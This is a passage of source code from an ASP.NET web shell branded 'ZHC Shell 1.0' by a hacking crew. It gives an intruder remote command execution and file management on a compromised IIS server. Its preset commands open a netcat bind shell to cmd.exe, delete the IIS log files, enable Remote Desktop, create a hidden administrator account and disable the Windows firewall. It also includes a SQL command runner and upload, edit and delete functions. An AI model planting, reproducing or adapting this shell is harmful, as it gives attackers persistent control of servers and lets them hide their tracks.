  556. <td><%=Environment.OSVersion.ToString()%></td>
  557. </tr>
  558. <tr>
  559. <td>Started Time</td>
  560. <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  561. </tr>
  562. <tr>
  563. <td>System Time</td>
  564. <td><%=now%></td>
  565. </tr>
  566. <tr>
  567. <td>IIS Version</td>
  568. <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  569. </tr>
  570. <tr>
  571. <td>HTTPS</td>
  572. <td><%=request.ServerVariables("HTTPS")%></td>
  573. </tr>
  574. <tr>
  575. <td>PATH_INFO</td>
  576. <td><%=request.ServerVariables("PATH_INFO")%></td>
  577. </tr>
  578. <tr>
  579. <td>PATH_TRANSLATED</td>
  580. <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  581. <tr>
  582. <td>SERVER_PORT</td>
  583. <td><%=request.ServerVariables("SERVER_PORT")%></td>
  584. </tr>
  585. <tr>
  586. <td>SeesionID</td>
  587. <td><%=Session.SessionID%></td>
  588. </tr>
  589. <tr>
  590. <td colspan="2"><span class="style3"><b>Client Infomation</b></span></td>
  591. </tr>
  592. <tr>
  593. <td>Client Proxy</td>
  594. <td><%=CP%></td>
  595. </tr>
  596. <tr>
  597. <td>Client IP</td>
  598. <td><%=CIP%></td>
  599. </tr>
  600. <tr>
  601. <td>User</td>
  602. <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  603. </tr>
  604. </table>
  605. <%
  606. case "cmd"
  607. %>
  608. <form runat="server">
  609. <center><p>[ Command Prompt ]</p>
  610. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  611. Command:
  612. <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  613. <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="button"/></center>
  614. <p>
  615. <asp:Label ID="result" runat="server" style="style2"/></p>
  616. </form>
  617. <%
  618. case "cmd2"
  619. %>
  620. <form runat="server">
  621. <center><p>[ Command Prompt ]</p>
  622. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  623. Command:
  624. <asp:TextBox ID="cmd2" runat="server" Width="300" class="TextBox" text="nc -l -v -p 12345 -d -e cmd.exe"/>
  625. <asp:Button ID="Button1234" runat="server" Text="Run" OnClick="RunCMD2" class="button" /></center>
  626. <p>
  627. <asp:Label ID="result2" runat="server" style="style2"/></p>
  628. </form>
  629. <%
  630. case "cmd3"
  631. %>
  632. <form runat="server">
  633. <center><p>[ Command Prompt ]</p>
  634. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  635. Command:
  636. <asp:TextBox ID="cmd3" runat="server" Width="300" class="TextBox" text="del C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"/>
  637. <asp:Button ID="Button12345" runat="server" Text="Run" OnClick="RunCMD3" class="button" /></center>
  638. <p>
  639. <asp:Label ID="result3" runat="server" style="style2"/></p>
  640. </form>
  641. <%
  642. case "cmd4"
  643. %>
  644. <form runat="server">
  645. <center><p>[ Command Prompt ]</p>
  646. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  647. Command:
  648. <asp:TextBox ID="cmd4" runat="server" Width="300" class="TextBox" text="reg add hklm\system\currentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x0 /f"/>
  649. <asp:Button ID="Button123456" runat="server" Text="Run" OnClick="RunCMD4" class="button" /></center>
  650. <p>
  651. <asp:Label ID="result4" runat="server" style="style2"/></p>
  652. </form><%
  653. case "cmd5"
  654. %>
  655. <form runat="server">
  656. <center><p>[ Command Prompt ]</p>
  657. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  658. Command:
  659. <asp:TextBox ID="cmd5" runat="server" Width="300" class="TextBox" text="net user USERNAME PASSWORD /add"/>
  660. <asp:Button ID="Button1234567" runat="server" Text="Run" OnClick="RunCMD5" class="button" /></center>
  661. <p>
  662. <asp:Label ID="result5" runat="server" style="style2"/></p>
  663. </form>
  664. <%
  665. case "cmd6"
  666. %>
  667. <form runat="server">
  668. <center><p>[ Command Prompt ]</p>
  669. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  670. Command:
  671. <asp:TextBox ID="cmd6" runat="server" Width="300" class="TextBox" text="net localgroup Administrators USERNAME /add"/>
  672. <asp:Button ID="Button12345678" runat="server" Text="Run" OnClick="RunCMD6" class="button" /></center>
  673. <p>
  674. <asp:Label ID="result6" runat="server" style="style2"/></p>
  675. </form>
  676. <%
  677. case "cmd7"
  678. %>
  679. <form runat="server">
  680. <center><p>[ Command Prompt ]</p>
  681. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  682. Command:
  683. <asp:TextBox ID="cmd7" runat="server" Width="300" class="TextBox" text="reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t REG_DWORD /d 0x0 /f"/>
  684. <asp:Button ID="Button123456789" runat="server" Text="Run" OnClick="RunCMD7" class="button" /></center>
  685. <p>
  686. <asp:Label ID="result7" runat="server" style="style2"/></p>
  687. </form>
  688. <%
  689. case "sqlrootkit"
  690. %>
  691. <form runat="server">
  692. <center><p>[ SQL Command ]</p>
  693. <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
  694. <p>SQL Host:
  695. <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  696. <p>
  697. SQL Username:
  698. <asp:TextBox ID="SqlName" runat="server" Width="110" class="TextBox" Text='Username'/><br/>
  699. SQL Password:
  700. <asp:TextBox ID="SqlPass" runat="server" Width="110" class="TextBox" Text='Password'/>
  701. </p>
  702. Command:
  703. <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  704. <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="button"/>
  705. <p>
  706. <asp:Label ID="resultSQL" runat="server" style="style2"/></p></center>
  707. </form>
  708. <%
  709. case "del"
  710. dim a as string
  711. a=request.QueryString("src")
  712. call existdir(a)
  713. call del(a)
  714. response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
  715. case "copy"
  716. call existdir(request.QueryString("src"))
  717. session("cutboard")="" & request.QueryString("src")
  718. response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
  719. case "cut"
  720. call existdir(request.QueryString("src"))
  721. session("cutboard")="" & request.QueryString("src")
  722. response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
  723. case "plaster"
  724. dim ow as integer
  725. if request.Form("OverWrite")<>"" then ow=1
  726. if request.Form("Cancel")<>"" then ow=2
  727. url=request.QueryString("src")
  728. call existdir(url)
  729. dim d as string
  730. d=session("cutboard")
  731. if left(d,1)="" then
  732. TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  733. TEMP2=url & replace(path.getfilename(d),"","")
  734. if right(d,1)="\" then
  735. call xexistdir(TEMP1,ow)
  736. directory.move(replace(d,"",""),TEMP1 & "\")
  737. response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  738. else
  739. call xexistdir(TEMP2,ow)
  740. file.move(replace(d,"",""),TEMP2)
  741. response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  742. end if
  743. else
  744. TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  745. TEMP2=url & path.getfilename(replace(d,"",""))
  746. if right(d,1)="\" then
  747. call xexistdir(TEMP1,ow)
  748. directory.createdirectory(TEMP1)
  749. call copydir(replace(d,"",""),TEMP1 & "\")
  750. response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  751. else
  752. call xexistdir(TEMP2,ow)
  753. file.copy(replace(d,"",""),TEMP2)
  754. response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  755. end if
  756. end if
  757. case "upfile"
  758. url=request.QueryString("src")
  759. %>
  760. <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();">
  761. <center>Files will be uploaded to: <span class="style3"><%=url%></span><br>
  762. Upload:
  763. <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"><br><br>
  764. <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="button"></center>
  765. </form>
  766. <%
  767. case "new"
  768. url=request.QueryString("src")
  769. %>
  770. <form runat="server">
  771. <center><%=url%><br>
  772. Name:
  773. <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  774. <br>
  775. <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  776. <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/>
  777. <br><br>
  778. <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="button" OnClick="NewFD"/>
  779. <input name="Src" type="hidden" value="<%=url%>"></center>
  780. </form>
  781. <%
  782. case "edit"
  783. dim b as string
  784. b=request.QueryString("src")
  785. call existdir(b)
  786. dim myread as new streamreader(b,encoding.default)
  787. filepath.text=b
  788. content.text=myread.readtoend
  789. %>
  790. <form runat="server">
  791. <table width="80%" border="1" align="center">
  792. <tr> <td width="11%">Path</td>
  793. <td width="89%">
  794. <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
  795. *</td>
  796. </tr>
  797. <tr>
  798. <td>Content</td>
  799. <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
  800. </tr>
  801. <tr>
  802. <td></td>
  803. <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="button"/>
  804. </td>
  805. </tr>
  806. </table>
  807. </form>
  808. <%
  809. myread.close
  810. case "rename"
  811. url=request.QueryString("src")
  812. if request.Form("name")="" then
  813. %>
  814. <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  815. <center><p>You wish to rename <span class="style3"><%=request.QueryString("src")%></span> to: <%=getparentdir(request.QueryString("src"))%>
  816. <input type="text" name="name" class="TextBox"><br><br>
  817. <input type="submit" name="Submit3" value="Submit" class="button">
  818. </p></center>
  819. </form>
  820. <script language="javascript">
  function checkname()
  {
    // Client-side check for the rename form (formRn): returns false to
    // block submission while the "name" field is still empty.
    var enteredName = formRn.name.value;
    if (enteredName != "") {
      return;
    }
    alert("You shall input filename :(");
    return false;
  }
  825. </script>
  826. <%
  827. else
  828. if Rename() then
  829. response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  830. else
  831. response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  832. end if
  833. end if
  834. case "samename"
  835. url=request.QueryString("src")
  836. %>
  837. <form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
  838. <p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  839. <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="button">
  840. <input name="Cancel" type="submit" id="Cancel" value="No" class="button">
  841. </form>
  842. <p>
  843. <%
  844. case "logout"
  845. session.Abandon()
  846. response.Write("<center>Have a nice day...</center>")
  847. response.Write("<script>alert(' Goodbye !');location.href='rootshell.aspx" & request.ServerVariables("URL") & "';</sc" & "ript>")
  848. end select
  849. end if
  850. Catch error_x
  851. response.Write("<br/><center><font color=""red""></font></center>")
  852. End Try
  853. %>
  854. </p>
  855. <script language="javascript">
  function closewindow()
  {
    // Close the current browser window.
    self.close();
  }
  858. </script>
  859. <b><p align="center" valign="bottom" class="footer">ZHC Shell 1.0&nbsp;&bull;&nbsp;2011<br/>
  860. By XXx_Death_xXX Of <a href="http://www.zone-hack.com" target="_blank" title="Welcome to ZHC SHEll"> ZCompany Hacking Crew</a>&nbsp;&bull;&nbsp;zone-hack.com #ZHC</p></b>
  861. </body>
  862. </html>